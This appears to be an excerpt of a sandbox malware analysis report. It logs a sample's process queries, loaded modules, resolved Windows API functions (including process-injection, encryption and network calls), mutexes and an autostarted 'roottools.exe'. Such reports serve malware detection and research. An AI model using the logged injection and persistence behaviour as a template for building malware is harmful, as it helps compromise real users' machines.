Open	c:\program files\microsoft office\root\office16\winword.exe	desired_access = PROCESS_QUERY_INFORMATION	15	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppsvc.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\sppsvc.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\wbem\wmiprvse.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\syswow64\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	19	Fn
Open	c:\windows\system32\dllhost.exe	desired_access = PROCESS_QUERY_INFORMATION	3	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\windows\explorer.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files\microsoft office\root\office16\onenotem.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\windows\system32\rundll32.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files (x86)\google\luxury-westminster-editing-cube.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files\uninstall information\devon stickers.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files\windows photo viewer\eagles_podcast_type_marker.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files (x86)\windows mail\groups.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files\windows photo viewer\filesdetectedlosebenjamin.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files (x86)\mozilla firefox\cincinnati consumers se.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files (x86)\common files\simply_wa_thumbnail_programmers.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files\dvd maker\medicaid.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files (x86)\java\gateway.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files\windows nt\laden.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files (x86)\windows media player\lying-yourself.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files\windows nt\disclaimer_saudi_agreed_oem.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files (x86)\adobe\colleague wrap.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files\microsoft office\hottest-jm-depression-fought.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\program files (x86)\google\saturday.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn
Open	c:\windows\syswow64\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	2	Fn

Module (228)

Operation	Module	Additional Information	Count	Logfile
Load	KERNEL32.dll	base_address = 0x759f0000	1	Fn
Load	USER32.dll	base_address = 0x75790000	1	Fn
Load	CRYPT32.dll	base_address = 0x758d0000	1	Fn
Load	ADVAPI32.dll	base_address = 0x756e0000	1	Fn
Load	SHELL32.dll	base_address = 0x75c50000	1	Fn
Load	SHLWAPI.dll	base_address = 0x750d0000	1	Fn
Load	PSAPI.DLL	base_address = 0x74eb0000	1	Fn
Load	ole32.dll	base_address = 0x75450000	1	Fn
Load	GDI32.dll	base_address = 0x75130000	1	Fn
Load	WININET.dll	base_address = 0x75350000	1	Fn
Load	urlmon.dll	base_address = 0x76c40000	1	Fn
Load	OLEAUT32.dll	base_address = 0x76b60000	1	Fn
Load	Secur32.dll	base_address = 0x748e0000	1	Fn
Get Handle	c:\windows\syswow64\ntdll.dll	base_address = 0x77270000	1	Fn
Get Filename	-	process_name = c:\windows\syswow64\svchost.exe, file_name_orig = C:\Windows\SysWOW64\svchost.exe, size = 260	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateThread, address_out = 0x75a07a2f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryA, address_out = 0x75a049d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteFileW, address_out = 0x75a089b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapReAlloc, address_out = 0x772b1f6e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetNativeSystemInfo, address_out = 0x75a110b5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThread, address_out = 0x75a034d5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapAlloc, address_out = 0x7729e026	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapDestroy, address_out = 0x75a035b7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAllocEx, address_out = 0x75a1d9b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalFree, address_out = 0x75a02d3c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteCriticalSection, address_out = 0x772a45f5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetComputerNameW, address_out = 0x75a0dd0e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcessHeap, address_out = 0x75a014e9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SystemTimeToFileTime, address_out = 0x75a05a7e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalMemoryStatusEx, address_out = 0x75a2d4c4	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessW, address_out = 0x75a0103d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WideCharToMultiByte, address_out = 0x75a0170d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InterlockedIncrement, address_out = 0x75a01400	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemTime, address_out = 0x75a05a96	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFreeEx, address_out = 0x75a1d9c8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsBadReadPtr, address_out = 0x75a2d075	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpiW, address_out = 0x75a1d5cd	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenMutexW, address_out = 0x75a05151	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEndOfFile, address_out = 0x75a1ce2e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThread, address_out = 0x75a017ec	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushFileBuffers, address_out = 0x75a0469b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RemoveVectoredExceptionHandler, address_out = 0x772e5f41	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcess, address_out = 0x75a01809	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetErrorMode, address_out = 0x75a01b00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersionExW, address_out = 0x75a01ae5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DuplicateHandle, address_out = 0x75a01886	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleA, address_out = 0x75a01245	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = AddVectoredExceptionHandler, address_out = 0x772e742b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitProcess, address_out = 0x75a07a10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessId, address_out = 0x75a011f8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileW, address_out = 0x75a2830d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpiA, address_out = 0x75a03e8e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsWow64Process, address_out = 0x75a0195e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstChangeNotificationW, address_out = 0x75a1d851	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextChangeNotification, address_out = 0x75a25c1e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsProcessInJob, address_out = 0x75a2c7ea	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateRemoteThread, address_out = 0x75a8416b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateNamedPipeW, address_out = 0x75a8414b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DisconnectNamedPipe, address_out = 0x75a841df	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ConnectNamedPipe, address_out = 0x75a840fb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalDrives, address_out = 0x75a05371	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDriveTypeW, address_out = 0x75a0418b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultUILanguage, address_out = 0x75a044ab	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileExW, address_out = 0x75a23b92	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentVariableW, address_out = 0x75a01b48	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointer, address_out = 0x75a017d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSection, address_out = 0x772a2c42	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeZoneInformation, address_out = 0x75a0465a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MultiByteToWideChar, address_out = 0x75a0192e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileAttributesW, address_out = 0x75a1d4f7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVolumeNameForVolumeMountPointW, address_out = 0x75a1052f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenProcess, address_out = 0x75a01986	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileTime, address_out = 0x75a04407	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReleaseMutex, address_out = 0x75a0111e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LeaveCriticalSection, address_out = 0x77292270	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameW, address_out = 0x75a04950	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileTime, address_out = 0x75a1ecbb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RemoveDirectoryW, address_out = 0x75a844cf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAlloc, address_out = 0x75a01856	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExpandEnvironmentStringsW, address_out = 0x75a04173	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteFile, address_out = 0x75a01282	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextFileW, address_out = 0x75a054ee	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnterCriticalSection, address_out = 0x772922b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileAttributesW, address_out = 0x75a01b18	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindClose, address_out = 0x75a04442	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenEventW, address_out = 0x75a015d6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTempPathW, address_out = 0x75a1d4dc	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetLastError, address_out = 0x75a011a9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapFree, address_out = 0x75a014c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapCreate, address_out = 0x75a04a2d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteProcessMemory, address_out = 0x75a1d9e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileSizeEx, address_out = 0x75a059e2	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstFileW, address_out = 0x75a04435	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InterlockedExchange, address_out = 0x75a01462	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVolumeInformationW, address_out = 0x75a1c860	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadFile, address_out = 0x75a03ed3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryW, address_out = 0x75a04259	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibrary, address_out = 0x75a034c8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleW, address_out = 0x75a034b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcAddress, address_out = 0x75a01222	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryW, address_out = 0x75a0492b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32FirstW, address_out = 0x75a28baf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32NextW, address_out = 0x75a2896c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x75a011c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateToolhelp32Snapshot, address_out = 0x75a2735f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileW, address_out = 0x75a03f5c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateMutexW, address_out = 0x75a0424c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ResetEvent, address_out = 0x75a016dd	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseHandle, address_out = 0x75a01410	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEvent, address_out = 0x75a016c5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Sleep, address_out = 0x75a010ff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventW, address_out = 0x75a0183e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForSingleObject, address_out = 0x75a01136	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForMultipleObjects, address_out = 0x75a04220	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount, address_out = 0x75a0110c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFree, address_out = 0x75a0186e	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetIconInfo, address_out = 0x757b49ea	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DrawIcon, address_out = 0x757b8deb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = LoadImageW, address_out = 0x757afbd1	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetCursorPos, address_out = 0x757b1218	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DefWindowProcW, address_out = 0x772a25dd	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CreateWindowExW, address_out = 0x757a8a29	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = UnregisterClassW, address_out = 0x757a9f84	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetKeyboardLayoutList, address_out = 0x757b2e69	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharLowerA, address_out = 0x757b3e75	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharToOemW, address_out = 0x75801a26	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = TranslateMessage, address_out = 0x757a7809	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PeekMessageW, address_out = 0x757b05ba	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DispatchMessageW, address_out = 0x757a787b	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MsgWaitForMultipleObjects, address_out = 0x757b0b4a	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = RegisterClassExW, address_out = 0x757ab17d	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SetWindowLongA, address_out = 0x757b6110	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetWindowLongA, address_out = 0x757ad156	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharUpperW, address_out = 0x757af350	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DestroyWindow, address_out = 0x757a9a55	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CryptImportPublicKeyInfo, address_out = 0x758e6c0e	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CryptDecodeObjectEx, address_out = 0x758dd718	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCloseKey, address_out = 0x756f469d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetAce, address_out = 0x756f45f0	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptEncrypt, address_out = 0x7570779b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x756f0e0c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = AllocateAndInitializeSid, address_out = 0x756f40e6	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetSidSubAuthority, address_out = 0x756f0e24	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetEntriesInAclW, address_out = 0x756f2a66	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCreateKeyExW, address_out = 0x756f40fe	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptVerifySignatureW, address_out = 0x756ec54a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetNamedSecurityInfoW, address_out = 0x756e9fe2	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetNamedSecurityInfoW, address_out = 0x756ef4fd	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptCreateHash, address_out = 0x756edf4e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptHashData, address_out = 0x756edf36	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetSecurityDescriptorSacl, address_out = 0x756f4680	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegSetValueExW, address_out = 0x756f14d6	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyHash, address_out = 0x756edf66	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenProcessToken, address_out = 0x756f4304	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = FreeSid, address_out = 0x756f412e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = InitializeSecurityDescriptor, address_out = 0x756f4620	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegOpenKeyExW, address_out = 0x756f468d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptImportKey, address_out = 0x756ec532	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x756f1f59	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenThreadToken, address_out = 0x756f432c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryValueExW, address_out = 0x756f46ad	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptReleaseContext, address_out = 0x756ee124	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetTokenInformation, address_out = 0x756f431c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyKey, address_out = 0x756ec51a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = AdjustTokenPrivileges, address_out = 0x756f418e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetSecurityDescriptorDacl, address_out = 0x756f415e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x756f4608	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = LookupPrivilegeValueW, address_out = 0x756f41b3	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetLengthSid, address_out = 0x756f413b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegDeleteValueW, address_out = 0x756ecf31	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegFlushKey, address_out = 0x7570773f	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegNotifyChangeKeyValue, address_out = 0x756ee15b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryInfoKeyW, address_out = 0x756f46e7	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegEnumKeyW, address_out = 0x756f445b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = InitiateSystemShutdownExW, address_out = 0x7573db3a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptAcquireContextW, address_out = 0x756edf14	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteW, address_out = 0x75c63c71	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteExW, address_out = 0x75c71e46	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetFolderPathW, address_out = 0x75cd5708	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsW, address_out = 0x750e45bf	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathIsURLW, address_out = 0x750e55bf	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathIsDirectoryEmptyW, address_out = 0x7510cd81	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = StrCmpNIW, address_out = 0x750e4745	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRenameExtensionW, address_out = 0x7510d32a	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = StrStrIW, address_out = 0x750e46e9	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathMatchSpecW, address_out = 0x750e86f7	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathCombineW, address_out = 0x750ec39c	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveFileSpecW, address_out = 0x750e3248	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAddBackslashW, address_out = 0x750ec177	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = wvnsprintfW, address_out = 0x7511066c	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathUnquoteSpacesW, address_out = 0x750e5331	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathSkipRootW, address_out = 0x750ffbf5	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindExtensionW, address_out = 0x750ea1b9	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = SHDeleteValueW, address_out = 0x750dfcca	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = wvnsprintfA, address_out = 0x750fedfe	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathIsDirectoryW, address_out = 0x750dff07	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveBackslashW, address_out = 0x750e5c62	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = UrlUnescapeA, address_out = 0x750fc6fb	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathQuoteSpacesW, address_out = 0x7510ce21	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = GetModuleFileNameExW, address_out = 0x74eb13f0	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CLSIDFromString, address_out = 0x7546e599	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitializeEx, address_out = 0x754909ad	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CreateStreamOnHGlobal, address_out = 0x7547363b	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoSetProxyBlanket, address_out = 0x75465ea5	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoCreateInstance, address_out = 0x75499d0b	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoUninitialize, address_out = 0x754986d3	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = DeleteObject, address_out = 0x75145689	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = GetDeviceCaps, address_out = 0x75144de0	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = CreateDCW, address_out = 0x7514e743	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = CreateCompatibleDC, address_out = 0x751454f4	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = SelectObject, address_out = 0x75144f70	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = CreateCompatibleBitmap, address_out = 0x75145f49	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = BitBlt, address_out = 0x75145ea6	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = DeleteDC, address_out = 0x751458b3	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetConnectA, address_out = 0x753749e9	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetReadFile, address_out = 0x7536b406	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpQueryInfoA, address_out = 0x7536a33e	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetQueryOptionA, address_out = 0x75361b56	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpOpenRequestA, address_out = 0x75374c7d	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCrackUrlA, address_out = 0x7535d075	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetSetOptionA, address_out = 0x753675e8	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenA, address_out = 0x7537f18e	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCloseHandle, address_out = 0x7536ab49	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpSendRequestA, address_out = 0x753e18f8	1	Fn
Get Address	c:\windows\syswow64\urlmon.dll	function = ObtainUserAgentString, address_out = 0x76c71d76	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 9, address_out = 0x76b63eae	1	Fn
Get Address	c:\windows\syswow64\secur32.dll	function = GetUserNameExW, address_out = 0x74dea415	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtQuerySystemInformation, address_out = 0x7728fda0	1	Fn

System (161)

Operation	Additional Information	Count	Logfile
Sleep	duration = -1 (infinite)	2	Fn
Get Info	type = Operating System	127	Fn
Get Info	type = SYSTEM_PROCESS_INFORMATION	16	Fn
Get Info	type = SYSTEM_PROCESS_INFORMATION	16	Fn

Mutex (6)

Operation	Additional Information	Count	Logfile
Create	mutex_name = 20BC29E135FB9B01285187E3B5593CC8	1	Fn
Create	mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE	1	Fn
Create	mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE	1	Fn
Create	mutex_name = B3F6E53F120A5BE5825B9C06159BB3F4	1	Fn
Release	mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE	1	Fn
Release	mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE	1	Fn

Process #15: roottools.exe

(Host: 670, Network: 0)

Information	Value
ID	#15
File Name	c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe
Command Line	"C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:04:52, Reason: Autostart
Unmonitor	End Time: 00:10:13, Reason: Terminated by Timeout
Monitor Duration	00:05:21

OS Process Information

Information	Value
PID	0x6a4
Parent PID	0x570 (c:\windows\explorer.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Groups	YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f83e (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 6A8 0x 324

Region

Name	Start VA	End VA	Type	Permissions	Actions
